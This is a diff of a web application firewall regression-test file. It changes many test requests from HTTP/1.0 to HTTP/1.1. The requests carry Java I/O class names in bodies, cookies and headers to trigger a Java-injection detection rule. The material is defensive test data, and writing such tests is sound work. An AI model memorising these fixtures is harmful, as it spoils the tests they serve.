+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.File\"}"
         output:
           log:
@@ -2005,7 +2005,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.File\": \"test\"}"
         output:
           log:
@@ -2025,7 +2025,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.FileOutputStream"
         output:
           log:
@@ -2045,7 +2045,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.FileOutputStream=test"
         output:
           log:
@@ -2066,7 +2066,7 @@ tests:
             Cookie: test=java.io.FileOutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2087,7 +2087,7 @@ tests:
             Cookie: java.io.FileOutputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2108,7 +2108,7 @@ tests:
             test: java.io.FileOutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2128,7 +2128,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.FileOutputStream\">element_value</element></xml>"
         output:
           log:
@@ -2148,7 +2148,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.FileOutputStream</element></xml>"
         output:
           log:
@@ -2168,7 +2168,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.FileOutputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -2188,7 +2188,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.FileOutputStream"
         output:
           log:
@@ -2208,7 +2208,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.FileOutputStream\"}"
         output:
           log:
@@ -2228,7 +2228,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.FileOutputStream\": \"test\"}"
         output:
           log:
@@ -2248,7 +2248,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.FilterInputStream"
         output:
           log:
@@ -2268,7 +2268,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.FilterInputStream=test"
         output:
           log:
@@ -2289,7 +2289,7 @@ tests:
             Cookie: test=java.io.FilterInputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2310,7 +2310,7 @@ tests:
             Cookie: java.io.FilterInputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2331,7 +2331,7 @@ tests:
             test: java.io.FilterInputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2351,7 +2351,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.FilterInputStream\">element_value</element></xml>"
         output:
           log:
@@ -2371,7 +2371,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.FilterInputStream</element></xml>"
         output:
           log:
@@ -2391,7 +2391,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.FilterInputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -2411,7 +2411,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.FilterInputStream"
         output:
           log:
@@ -2431,7 +2431,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.FilterInputStream\"}"
         output:
           log:
@@ -2451,7 +2451,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.FilterInputStream\": \"test\"}"
         output:
           log:
@@ -2471,7 +2471,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.FilterOutputStream"
         output:
           log:
@@ -2491,7 +2491,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.FilterOutputStream=test"
         output:
           log:
@@ -2512,7 +2512,7 @@ tests:
             Cookie: test=java.io.FilterOutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2533,7 +2533,7 @@ tests:
             Cookie: java.io.FilterOutputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2554,7 +2554,7 @@ tests:
             test: java.io.FilterOutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2574,7 +2574,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.FilterOutputStream\">element_value</element></xml>"
         output:
           log:
@@ -2594,7 +2594,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.FilterOutputStream</element></xml>"
         output:
           log:
@@ -2614,7 +2614,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.FilterOutputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -2634,7 +2634,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.FilterOutputStream"
         output:
           log:
@@ -2654,7 +2654,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.FilterOutputStream\"}"
         output:
           log:
@@ -2674,7 +2674,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.FilterOutputStream\": \"test\"}"
         output:
           log:
@@ -2694,7 +2694,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.FilterReader"
         output:
           log:
@@ -2714,7 +2714,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.FilterReader=test"
         output:
           log:
@@ -2735,7 +2735,7 @@ tests:
             Cookie: test=java.io.FilterReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2756,7 +2756,7 @@ tests:
             Cookie: java.io.FilterReader=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2777,7 +2777,7 @@ tests:
             test: java.io.FilterReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2797,7 +2797,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.FilterReader\">element_value</element></xml>"
         output:
           log:
@@ -2817,7 +2817,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.FilterReader</element></xml>"
         output:
           log:
@@ -2837,7 +2837,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.FilterReader</element></l3></l2></l1></xml>"
         output:
           log:
@@ -2857,7 +2857,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.FilterReader"
         output:
           log:
@@ -2877,7 +2877,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.FilterReader\"}"
         output:
           log:
@@ -2897,7 +2897,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.FilterReader\": \"test\"}"
         output:
           log:
@@ -2917,7 +2917,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.InputStream"
         output:
           log:
@@ -2937,7 +2937,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.InputStream=test"
         output:
           log:
@@ -2958,7 +2958,7 @@ tests:
             Cookie: test=java.io.InputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -2979,7 +2979,7 @@ tests:
             Cookie: java.io.InputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3000,7 +3000,7 @@ tests:
             test: java.io.InputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3020,7 +3020,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.InputStream\">element_value</element></xml>"
         output:
           log:
@@ -3040,7 +3040,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.InputStream</element></xml>"
         output:
           log:
@@ -3060,7 +3060,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.InputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -3080,7 +3080,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.InputStream"
         output:
           log:
@@ -3100,7 +3100,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.InputStream\"}"
         output:
           log:
@@ -3120,7 +3120,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.InputStream\": \"test\"}"
         output:
           log:
@@ -3140,7 +3140,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.InputStreamReader"
         output:
           log:
@@ -3160,7 +3160,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.InputStreamReader=test"
         output:
           log:
@@ -3181,7 +3181,7 @@ tests:
             Cookie: test=java.io.InputStreamReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3202,7 +3202,7 @@ tests:
             Cookie: java.io.InputStreamReader=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3223,7 +3223,7 @@ tests:
             test: java.io.InputStreamReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3243,7 +3243,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.InputStreamReader\">element_value</element></xml>"
         output:
           log:
@@ -3263,7 +3263,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.InputStreamReader</element></xml>"
         output:
           log:
@@ -3283,7 +3283,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.InputStreamReader</element></l3></l2></l1></xml>"
         output:
           log:
@@ -3303,7 +3303,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.InputStreamReader"
         output:
           log:
@@ -3323,7 +3323,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.InputStreamReader\"}"
         output:
           log:
@@ -3343,7 +3343,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.InputStreamReader\": \"test\"}"
         output:
           log:
@@ -3363,7 +3363,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.LineNumberReader"
         output:
           log:
@@ -3383,7 +3383,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.LineNumberReader=test"
         output:
           log:
@@ -3404,7 +3404,7 @@ tests:
             Cookie: test=java.io.LineNumberReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3425,7 +3425,7 @@ tests:
             Cookie: java.io.LineNumberReader=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3446,7 +3446,7 @@ tests:
             test: java.io.LineNumberReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3466,7 +3466,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.LineNumberReader\">element_value</element></xml>"
         output:
           log:
@@ -3486,7 +3486,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.LineNumberReader</element></xml>"
         output:
           log:
@@ -3506,7 +3506,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.LineNumberReader</element></l3></l2></l1></xml>"
         output:
           log:
@@ -3526,7 +3526,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.LineNumberReader"
         output:
           log:
@@ -3546,7 +3546,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.LineNumberReader\"}"
         output:
           log:
@@ -3566,7 +3566,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.LineNumberReader\": \"test\"}"
         output:
           log:
@@ -3586,7 +3586,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.ObjectOutputStream"
         output:
           log:
@@ -3606,7 +3606,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.ObjectOutputStream=test"
         output:
           log:
@@ -3627,7 +3627,7 @@ tests:
             Cookie: test=java.io.ObjectOutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3648,7 +3648,7 @@ tests:
             Cookie: java.io.ObjectOutputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3669,7 +3669,7 @@ tests:
             test: java.io.ObjectOutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3689,7 +3689,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.ObjectOutputStream\">element_value</element></xml>"
         output:
           log:
@@ -3709,7 +3709,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.ObjectOutputStream</element></xml>"
         output:
           log:
@@ -3729,7 +3729,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.ObjectOutputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -3749,7 +3749,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.ObjectOutputStream"
         output:
           log:
@@ -3769,7 +3769,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.ObjectOutputStream\"}"
         output:
           log:
@@ -3789,7 +3789,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.ObjectOutputStream\": \"test\"}"
         output:
           log:
@@ -3809,7 +3809,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.OutputStream"
         output:
           log:
@@ -3829,7 +3829,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.OutputStream=test"
         output:
           log:
@@ -3850,7 +3850,7 @@ tests:
             Cookie: test=java.io.OutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3871,7 +3871,7 @@ tests:
             Cookie: java.io.OutputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3892,7 +3892,7 @@ tests:
             test: java.io.OutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -3912,7 +3912,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.OutputStream\">element_value</element></xml>"
         output:
           log:
@@ -3932,7 +3932,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.OutputStream</element></xml>"
         output:
           log:
@@ -3952,7 +3952,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.OutputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -3972,7 +3972,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.OutputStream"
         output:
           log:
@@ -3992,7 +3992,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.OutputStream\"}"
         output:
           log:
@@ -4012,7 +4012,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.OutputStream\": \"test\"}"
         output:
           log:
@@ -4032,7 +4032,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.PipedOutputStream"
         output:
           log:
@@ -4052,7 +4052,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.PipedOutputStream=test"
         output:
           log:
@@ -4073,7 +4073,7 @@ tests:
             Cookie: test=java.io.PipedOutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4094,7 +4094,7 @@ tests:
             Cookie: java.io.PipedOutputStream=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4115,7 +4115,7 @@ tests:
             test: java.io.PipedOutputStream
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4135,7 +4135,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.PipedOutputStream\">element_value</element></xml>"
         output:
           log:
@@ -4155,7 +4155,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.PipedOutputStream</element></xml>"
         output:
           log:
@@ -4175,7 +4175,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.PipedOutputStream</element></l3></l2></l1></xml>"
         output:
           log:
@@ -4195,7 +4195,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.PipedOutputStream"
         output:
           log:
@@ -4215,7 +4215,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.PipedOutputStream\"}"
         output:
           log:
@@ -4235,7 +4235,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"java.io.PipedOutputStream\": \"test\"}"
         output:
           log:
@@ -4255,7 +4255,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.PipedReader"
         output:
           log:
@@ -4275,7 +4275,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "java.io.PipedReader=test"
         output:
           log:
@@ -4296,7 +4296,7 @@ tests:
             Cookie: test=java.io.PipedReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4317,7 +4317,7 @@ tests:
             Cookie: java.io.PipedReader=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4338,7 +4338,7 @@ tests:
             test: java.io.PipedReader
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=value"
         output:
           log:
@@ -4358,7 +4358,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.PipedReader\">element_value</element></xml>"
         output:
           log:
@@ -4378,7 +4378,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.io.PipedReader</element></xml>"
         output:
           log:
@@ -4398,7 +4398,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.io.PipedReader</element></l3></l2></l1></xml>"
         output:
           log:
@@ -4418,7 +4418,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=java.io.PipedReader"
         output:
           log:
@@ -4438,7 +4438,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"java.io.PipedReader\"}"
         output:
           log:
@@ -4458,7 +4458,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
